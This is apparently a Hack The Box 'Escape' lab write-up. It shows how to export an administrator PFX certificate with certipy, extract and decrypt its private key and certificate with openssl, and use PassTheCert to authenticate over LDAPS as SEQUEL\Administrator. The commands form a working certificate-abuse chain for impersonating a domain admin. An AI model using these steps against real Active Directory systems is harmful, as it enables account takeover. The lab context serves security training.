InfoSec LAB

Escape_PFX_Extraction

Created: 3 min read

PFX_Extraction (optional)

As previously pointed out a lot can be done with PFX files since these files contains server certificates, intermediate certificates, and the private keys. it is entirely possible to extract a public(certificate) and private key pair from a PFX file.

Exporting PFX

┌──(kali㉿kali)-[~/…/htb/labs/escape/ADCS]
└─$ certipy cert -export -pfx administrator.pfx -password "" -out unprotected.administrator.pfx
Certipy v4.7.0 - by Oliver Lyak (ly4k)
 
[*] Writing PFX to 'unprotected.administrator.pfx'

Exporting the PFX file with no password set

Private Key

┌──(kali㉿kali)-[~/…/htb/labs/escape/ADCS]
└─$ openssl pkcs12 -in administrator.pfx -nocerts -out administrator.private
enter import password:
enter pem pass phrase: qwe123
verifying - enter pem pass phrase: qwe123

Extracting the private key from the administrator.pfx file Since the PFX file was exported with no password, I don’t need to provide one However, it prompts me to provide the passphrase for the private key. This is totally normal. A PEM key file must have a passphrase to be functional. I set it to qwe123

Decryption

┌──(kali㉿kali)-[~/…/htb/labs/escape/ADCS]
└─$ openssl rsa -in administrator.private -out administrator.private.decrypted
Enter pass phrase for administrator.private: qwe123
writing RSA key

Now that this is a private key, however, it is encrypted with the passphrase above the during the process of extraction; qwe123 So it needs to be decrypted again.

Public Key

┌──(kali㉿kali)-[~/…/htb/labs/escape/ADCS]
└─$ openssl pkcs12 -in administrator.pfx -clcerts -nokeys -out administrator.public
enter import password:

Extracting the public(certificate) key from the administrator.pfx file Since it is a public(certificate) key, it does not prompts me for providing a passphrase unlike the private key. I don’t provide password here as well since there isn’t any

Validation

┌──(kali㉿kali)-[~/…/htb/labs/escape/ADCS]
└─$ git clone https://github.com/AlmondOffSec/PassTheCert.git
Cloning into 'PassTheCert'...
remote: Enumerating objects: 109, done.
remote: Counting objects: 100% (109/109), done.
remote: Compressing objects: 100% (75/75), done.
remote: Total 109 (delta 47), reused 83 (delta 33), pack-reused 0
Receiving objects: 100% (109/109), 44.73 KiB | 2.63 MiB/s, done.
Resolving deltas: 100% (47/47), done.

According to the author’s blog, PassTheCert is a simple C# tool that can authenticate to an LDAP server using a client certificate, and perform actions that are interesting for an attacker. Unlike most other offensive tools, it has the added bonus of working in environments where LDAP Channel Binding is enabled, because Schannel authentication is, by design, not subject to Channel Binding.

┌──(kali㉿kali)-[~/…/htb/labs/escape/ADCS]
└─$ python3 PassTheCert/Python/passthecert.py -action whoami -crt administrator.public -key administrator.private.decrypted -domain SEQUEL.HTB -dc-ip $IP -port 636         
Impacket v0.11.0 - Copyright 2023 Fortra
 
[*] You are logged in as: sequel\Administrator

Successfully validated.

Interactive Graph View

Backlinks